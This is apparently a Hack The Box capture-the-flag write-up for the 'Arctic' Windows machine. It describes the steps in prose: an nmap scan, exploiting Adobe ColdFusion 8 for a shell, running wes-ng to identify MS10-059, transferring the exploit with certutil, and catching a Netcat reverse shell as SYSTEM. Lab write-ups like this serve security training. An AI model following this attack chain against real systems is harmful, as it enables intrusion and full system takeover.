Arctic HTB
IP
10.10.10.11Nmap
sudo nmap -sV -sC -A -oA nmap/results 10.10.10.11
we can see ports
135: RPC
8500: FMTP (Flight Message Transfer Protocol) quite old service
49164: RPC
we can use port number 8500 to access a web page
as we manually navigate through the directories (by the way very slow webpage) we do come across something interesting
from this, we can tell the application runs
ADOBE COLDFUSION 8
using basic credentials doesn't work, but when we catch a request in Burp we do find some funky parameters
lets search for an exploit
we can bring it down to our working directory
we need to modify the script and add our host IP and Port, Target machine IP
Now we can run the exploit
then we get a shell as tolis
Privilege Escalation via tolis
Lets gather some information on the machine
Nothing interesting with users and groups
What we can do is gather system information and run it through a tool such as wes-ng and see if we can find a exploit to elevate our privileges
First let's clone wes-ng onto our local machine
from our targets machine
Now we can just copy and paste the output into a file on our local machine called systeminfo.txt
to use wes-ng we first need to update the database in the directory we are working in
running wes with our systeminfo.txt
from the output of wes we can determine we can use ms10-059
first, we need to clone the following repo onto our local machine keep in mind this repo is quite large and you can clone the single MS10-O59 exploit
let's cp MS10-059 into our working directory
lets start a python3 server
from our target machine we want to download the exploit we can use certutil
we should now have MS10-059 in onto our target machine
on our local machine let's start a Netcat listener with rlwrap
what does rlwrap do: provides read line's line editing, persistent history and competition, it gives us a more complete and stable shell
Now lets run our exploit
we now have a shell as nt authority\system
Last updated